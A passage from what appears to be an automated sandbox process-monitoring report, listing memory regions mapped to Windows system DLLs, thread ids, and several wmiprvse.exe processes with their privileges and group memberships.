monitored = 0 entry_point = 0x7ffc119655f0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 741 start_va = 0x7ffc11b20000 end_va = 0x7ffc11b4bfff monitored = 0 entry_point = 0x7ffc11b27370 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 742 start_va = 0x7ffc11b50000 end_va = 0x7ffc11b68fff monitored = 0 entry_point = 0x7ffc11b5c950 region_type = mapped_file name = "eventaggregation.dll" filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll") Region: id = 743 start_va = 0x7ffc11b70000 end_va = 0x7ffc11b81fff monitored = 0 entry_point = 0x7ffc11b73e30 region_type = mapped_file name = "umpdc.dll" filename = "\\Windows\\System32\\umpdc.dll" (normalized: "c:\\windows\\system32\\umpdc.dll") Region: id = 744 start_va = 0x7ffc11b90000 end_va = 0x7ffc11bdafff monitored = 0 entry_point = 0x7ffc11b93480 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 745 start_va = 0x7ffc11be0000 end_va = 0x7ffc11c81fff monitored = 0 entry_point = 0x7ffc11c0ca60 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 746 start_va = 0x7ffc11c90000 end_va = 0x7ffc11cbdfff monitored = 0 entry_point = 0x7ffc11c94f10 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 747 start_va = 0x7ffc11cc0000 end_va = 0x7ffc11cf0fff monitored = 0 entry_point = 0x7ffc11cce380 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 748 start_va = 0x7ffc11d10000 end_va = 0x7ffc11d2efff monitored = 0 entry_point = 0x7ffc11d18ca0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 749 start_va = 0x7ffc11e80000 end_va = 0x7ffc11fdcfff monitored = 0 entry_point = 0x7ffc11ecefa0 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 750 start_va = 0x7ffc11fe0000 end_va = 0x7ffc12001fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "win32u.dll" filename = "\\Windows\\System32\\win32u.dll" (normalized: "c:\\windows\\system32\\win32u.dll") Region: id = 751 start_va = 0x7ffc12010000 end_va = 0x7ffc120acfff monitored = 0 entry_point = 0x7ffc12025390 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 752 start_va = 0x7ffc120b0000 end_va = 0x7ffc1212efff monitored = 0 entry_point = 0x7ffc120e73e0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 753 start_va = 0x7ffc12130000 end_va = 0x7ffc123f6fff monitored = 0 entry_point = 0x7ffc12141bd0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 754 start_va = 0x7ffc12400000 end_va = 0x7ffc1244cfff monitored = 0 entry_point = 0x7ffc12413280 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 755 start_va = 0x7ffc12450000 end_va = 0x7ffc124affff monitored = 0 entry_point = 0x7ffc12460380 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 756 start_va = 0x7ffc124b0000 end_va = 0x7ffc125affff monitored = 0 entry_point = 0x7ffc124c5ac0 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 757 start_va = 0x7ffc125b0000 end_va = 0x7ffc125d6fff monitored = 0 entry_point = 0x7ffc125b8690 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 758 start_va = 0x7ffc125e0000 end_va = 0x7ffc126e9fff monitored = 0 entry_point = 0x7ffc12611300 region_type = mapped_file name = "gdi32full.dll" filename = "\\Windows\\System32\\gdi32full.dll" (normalized: "c:\\windows\\system32\\gdi32full.dll") Region: id = 759 start_va = 0x7ffc126f0000 end_va = 0x7ffc1279dfff monitored = 0 entry_point = 0x7ffc1272b940 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 760 start_va = 0x7ffc127a0000 end_va = 0x7ffc12874fff monitored = 0 entry_point = 0x7ffc127bd190 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 761 start_va = 0x7ffc12880000 end_va = 0x7ffc12929fff monitored = 0 entry_point = 0x7ffc12895470 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 762 start_va = 0x7ffc12930000 end_va = 0x7ffc12959fff monitored = 0 entry_point = 0x7ffc129348d0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 763 start_va = 0x7ffc12960000 end_va = 0x7ffc13090fff monitored = 0 entry_point = 0x7ffc12a6e6e0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 764 start_va = 0x7ffc131c0000 end_va = 0x7ffc13513fff monitored = 0 entry_point = 0x7ffc132b1d00 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 765 start_va = 0x7ffc13ab0000 end_va = 0x7ffc13b4dfff monitored = 0 entry_point = 0x7ffc13ab7850 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 766 start_va = 0x7ffc13b50000 end_va = 0x7ffc13c78fff monitored = 0 entry_point = 0x7ffc13b76140 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 767 start_va = 0x7ffc13c80000 end_va = 0x7ffc13d1afff monitored = 0 entry_point = 0x7ffc13c9c3e0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 768 start_va = 0x7ffc13d20000 end_va = 0x7ffc13d98fff monitored = 0 entry_point = 0x7ffc13d428f0 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll") Region: id = 769 start_va = 0x7ffc13db0000 end_va = 0x7ffc13e1afff monitored = 0 entry_point = 0x7ffc13dc4300 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 770 start_va = 0x7ffc13f00000 end_va = 0x7ffc13fbcfff monitored = 0 entry_point = 0x7ffc13f17070 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 771 start_va = 0x7ffc13fc0000 end_va = 0x7ffc1415ffff monitored = 0 entry_point = 0x7ffc13fd7a10 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 772 start_va = 0x7ffc14160000 end_va = 0x7ffc141b5fff monitored = 0 entry_point = 0x7ffc14162840 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 773 start_va = 0x7ffc141d0000 end_va = 0x7ffc142f2fff monitored = 0 entry_point = 0x7ffc1422da30 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 774 start_va = 0x7ffc14300000 end_va = 0x7ffc14354fff monitored = 0 entry_point = 0x7ffc1430a7e0 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 775 start_va = 0x7ffc14570000 end_va = 0x7ffc14578fff monitored = 0 entry_point = 0x7ffc14572020 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 776 start_va = 0x7ffc14580000 end_va = 0x7ffc14627fff monitored = 0 entry_point = 0x7ffc1459d990 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 777 start_va = 0x7ffc14630000 end_va = 0x7ffc1464cfff monitored = 0 entry_point = 0x7ffc146323b0 region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\System32\\imagehlp.dll" (normalized: "c:\\windows\\system32\\imagehlp.dll") Region: id = 778 start_va = 0x7ffc14690000 end_va = 0x7ffc14883fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 798 start_va = 0x1f00000 end_va = 0x1ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 799 start_va = 0x600000 end_va = 0x608fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 801 start_va = 0x2600000 end_va = 0x26fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 802 start_va = 0x2cf0000 end_va = 0x2deffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002cf0000" filename = "" Region: id = 902 start_va = 0x600000 end_va = 0x608fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 904 start_va = 0x600000 end_va = 0x608fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 905 start_va = 0x600000 end_va = 0x608fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 906 start_va = 0x600000 end_va = 0x608fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 935 start_va = 0x600000 end_va = 0x61ffff monitored = 0 entry_point = 0x603920 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 936 start_va = 0x620000 end_va = 0x633fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sppc.dll.mui" filename = "\\Windows\\System32\\en-US\\sppc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\sppc.dll.mui") Region: id = 937 start_va = 0x600000 end_va = 0x61ffff monitored = 0 entry_point = 0x603920 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 938 start_va = 0x620000 end_va = 0x633fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sppc.dll.mui" filename = "\\Windows\\System32\\en-US\\sppc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\sppc.dll.mui") Region: id = 939 start_va = 0x600000 end_va = 0x61ffff monitored = 0 entry_point = 0x603920 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 940 start_va = 0x620000 end_va = 0x633fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sppc.dll.mui" filename = "\\Windows\\System32\\en-US\\sppc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\sppc.dll.mui") Thread: id = 5 os_tid = 0x540 Thread: id = 6 os_tid = 0xaf8 Thread: id = 7 os_tid = 0xee4 Thread: id = 8 os_tid = 0xd44 Thread: id = 9 os_tid = 0xc90 Thread: id = 10 os_tid = 0xf34 Thread: id = 11 os_tid = 0x794 Thread: id = 12 os_tid = 0x640 Thread: id = 13 os_tid = 0xe48 Thread: id = 14 os_tid = 0x9f4 Thread: id = 15 os_tid = 0xacc Thread: id = 16 os_tid = 0xad8 Thread: id = 17 os_tid = 0x648 Thread: id = 18 os_tid = 0xcac Thread: id = 19 os_tid = 0x72c Thread: id = 20 os_tid = 0x1d0 Thread: id = 21 os_tid = 0x21c Thread: id = 22 os_tid = 0x250 Thread: id = 23 os_tid = 0x5ec Thread: id = 24 os_tid = 0x2c8 Thread: id = 25 os_tid = 0xe60 Thread: id = 26 os_tid = 0xe64 Thread: id = 27 os_tid = 0xea0 Thread: id = 28 os_tid = 0x1a0 Thread: id = 29 os_tid = 0x100 Thread: id = 30 os_tid = 0xfcc Thread: id = 31 os_tid = 0xe88 Thread: id = 32 os_tid = 0xe84 Thread: id = 33 os_tid = 0xe80 Thread: id = 34 os_tid = 0xe3c Thread: id = 35 os_tid = 0xe38 Thread: id = 36 os_tid = 0x958 Thread: id = 37 os_tid = 0x920 Thread: id = 38 os_tid = 0x898 Thread: id = 39 os_tid = 0x87c Thread: id = 40 os_tid = 0x878 Thread: id = 41 os_tid = 0x860 Thread: id = 42 os_tid = 0x85c Thread: id = 43 os_tid = 0x83c Thread: id = 44 os_tid = 0x60c Thread: id = 45 os_tid = 0x6ec Thread: id = 46 os_tid = 0x68c Thread: id = 47 os_tid = 0x554 Thread: id = 48 os_tid = 0x4f4 Thread: id = 49 os_tid = 0x47c Thread: id = 50 os_tid = 0x460 Thread: id = 51 os_tid = 0x440 Thread: id = 52 os_tid = 0x438 Thread: id = 53 os_tid = 0x434 Thread: id = 54 os_tid = 0x42c Thread: id = 55 os_tid = 0x404 Thread: id = 56 os_tid = 0x190 Thread: id = 57 os_tid = 0x324 Thread: id = 58 os_tid = 0x1bc Thread: id = 59 os_tid = 0x6c Thread: id = 80 os_tid = 0x169c Thread: id = 81 os_tid = 0x724 Thread: id = 82 os_tid = 0x1690 Process: id = "3" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x76a0d000" os_pid = "0xb64" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x310" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0004e458" [0xc000000f] Thread: id = 60 os_tid = 0xae8 Thread: id = 61 os_tid = 0xd48 Thread: id = 62 os_tid = 0x388 Thread: id = 63 os_tid = 0x508 Thread: id = 64 os_tid = 0x6f4 Thread: id = 65 os_tid = 0x694 Thread: id = 66 os_tid = 0xb20 Thread: id = 67 os_tid = 0x5a0 Thread: id = 68 os_tid = 0x774 Process: id = "4" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x4ee83000" os_pid = "0xe00" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x310" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "S-1-5-80-2949785411-1458004381-4011503523-1439849274-3428788682" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "S-1-5-80-1139522462-2689595747-457373284-4037083511-4201549542" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wisvc" [0xa], "NT SERVICE\\wlidsvc" [0xa], "S-1-5-80-3577588319-513283748-931039988-2701962192-2148388740" [0xa], "NT SERVICE\\WpnService" [0xe], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000bbce" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 69 os_tid = 0xaa0 Thread: id = 70 os_tid = 0x100c Thread: id = 71 os_tid = 0x13f8 Thread: id = 72 os_tid = 0x1444 Thread: id = 73 os_tid = 0x66c Thread: id = 74 os_tid = 0xcb8 Thread: id = 75 os_tid = 0x4f0 Thread: id = 76 os_tid = 0xe04 Process: id = "5" image_name = "wmiprvse.exe" filename = "c:\\windows\\syswow64\\wbem\\wmiprvse.exe" page_root = "0x691e0000" os_pid = "0x94c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x310" cmd_line = "C:\\Windows\\sysWOW64\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Local Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0010cac0" [0xc000000f], "S-1-5-32-1488445330-856673777-1515413738-1380768593-2977925950-2228326386-886087428-2802422674" [0x7], "S-1-5-32-383293015-3350740429-1839969850-1819881064-1569454686-4198502490-78857879-1413643331" [0x7], "S-1-5-32-2035927579-283314533-3422103930-3587774809-765962649-3034203285-3544878962-607181067" [0x7], "S-1-5-32-3659434007-2290108278-1125199667-3679670526-1293081662-2164323352-1777701501-2595986263" [0x7], "S-1-5-32-11742800-2107441976-3443185924-4134956905-3840447964-3749968454-3843513199-670971053" [0x7], "S-1-5-32-3523901360-1745872541-794127107-675934034-1867954868-1951917511-1111796624-2052600462" [0x7] Region: id = 803 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 804 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 805 start_va = 0x40000 end_va = 0x5cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 806 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 807 start_va = 0xa0000 end_va = 0xdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 808 start_va = 0xe0000 end_va = 0xe3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 809 start_va = 0xf0000 end_va = 0xf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 810 start_va = 0x100000 end_va = 0x101fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 811 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 812 start_va = 0x870000 end_va = 0x8d9fff monitored = 0 entry_point = 0x88f080 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\SysWOW64\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\syswow64\\wbem\\wmiprvse.exe") Region: id = 813 start_va = 0x77840000 end_va = 0x779e1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 814 start_va = 0x7ffa0000 end_va = 0x7ffa0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffa0000" filename = "" Region: id = 815 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 816 start_va = 0x7ffe0000 end_va = 0x7ffe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 817 start_va = 0x7fff0000 end_va = 0xffffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 818 start_va = 0x7ffc14690000 end_va = 0x7ffc14883fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 819 start_va = 0x1b0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 820 start_va = 0x7ff70000 end_va = 0x7ff80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff70000" filename = "" Region: id = 821 start_va = 0x7ff90000 end_va = 0x7ff91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff90000" filename = "" Region: id = 822 start_va = 0x7ffc139f0000 end_va = 0x7ffc13a72fff monitored = 0 entry_point = 0x7ffc139ffb00 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 823 start_va = 0x7ffc14510000 end_va = 0x7ffc14568fff monitored = 0 entry_point = 0x7ffc14528ff0 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 824 start_va = 0x77830000 end_va = 0x77839fff monitored = 0 entry_point = 0x778312e0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 825 start_va = 0x7ff60000 end_va = 0x7ff61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff60000" filename = "" Region: id = 826 start_va = 0x7ff50000 end_va = 0x7ff58fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff50000" filename = "" Region: id = 827 start_va = 0x400000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 828 start_va = 0x77130000 end_va = 0x7721ffff monitored = 0 entry_point = 0x7714f5a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 829 start_va = 0x77310000 end_va = 0x77522fff monitored = 0 entry_point = 0x77424030 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 830 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 831 start_va = 0x7fe50000 end_va = 0x7ff4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007fe50000" filename = "" Region: id = 832 start_va = 0x550000 end_va = 0x618fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 833 start_va = 0x76be0000 end_va = 0x76c9efff monitored = 0 entry_point = 0x76c15ac0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 834 start_va = 0x110000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 835 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 836 start_va = 0x6fb30000 end_va = 0x6fbf8fff monitored = 0 entry_point = 0x6fb642f0 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 837 start_va = 0x76460000 end_va = 0x766dffff monitored = 0 entry_point = 0x7659a960 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 838 start_va = 0x76ac0000 end_va = 0x76bdffff monitored = 0 entry_point = 0x76aeb170 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\SysWOW64\\ucrtbase.dll" (normalized: "c:\\windows\\syswow64\\ucrtbase.dll") Region: id = 839 start_va = 0x76100000 end_va = 0x761b9fff monitored = 0 entry_point = 0x7613a2c0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 840 start_va = 0x6fac0000 end_va = 0x6fad1fff monitored = 0 entry_point = 0x6fac6800 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\SysWOW64\\ncobjapi.dll" (normalized: "c:\\windows\\syswow64\\ncobjapi.dll") Region: id = 841 start_va = 0x6fc10000 end_va = 0x6fc78fff monitored = 1 entry_point = 0x6fc2c930 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 842 start_va = 0x20000 end_va = 0x2dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 843 start_va = 0x620000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 844 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 845 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 846 start_va = 0x1a0000 end_va = 0x1a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 847 start_va = 0x76390000 end_va = 0x76408fff monitored = 0 entry_point = 0x763a1a00 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 848 start_va = 0x767f0000 end_va = 0x76864fff monitored = 0 entry_point = 0x7680f710 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 849 start_va = 0x8e0000 end_va = 0xc17fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 850 start_va = 0x75750000 end_va = 0x758e3fff monitored = 0 entry_point = 0x75789860 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 851 start_va = 0x77220000 end_va = 0x77237fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "win32u.dll" filename = "\\Windows\\SysWOW64\\win32u.dll" (normalized: 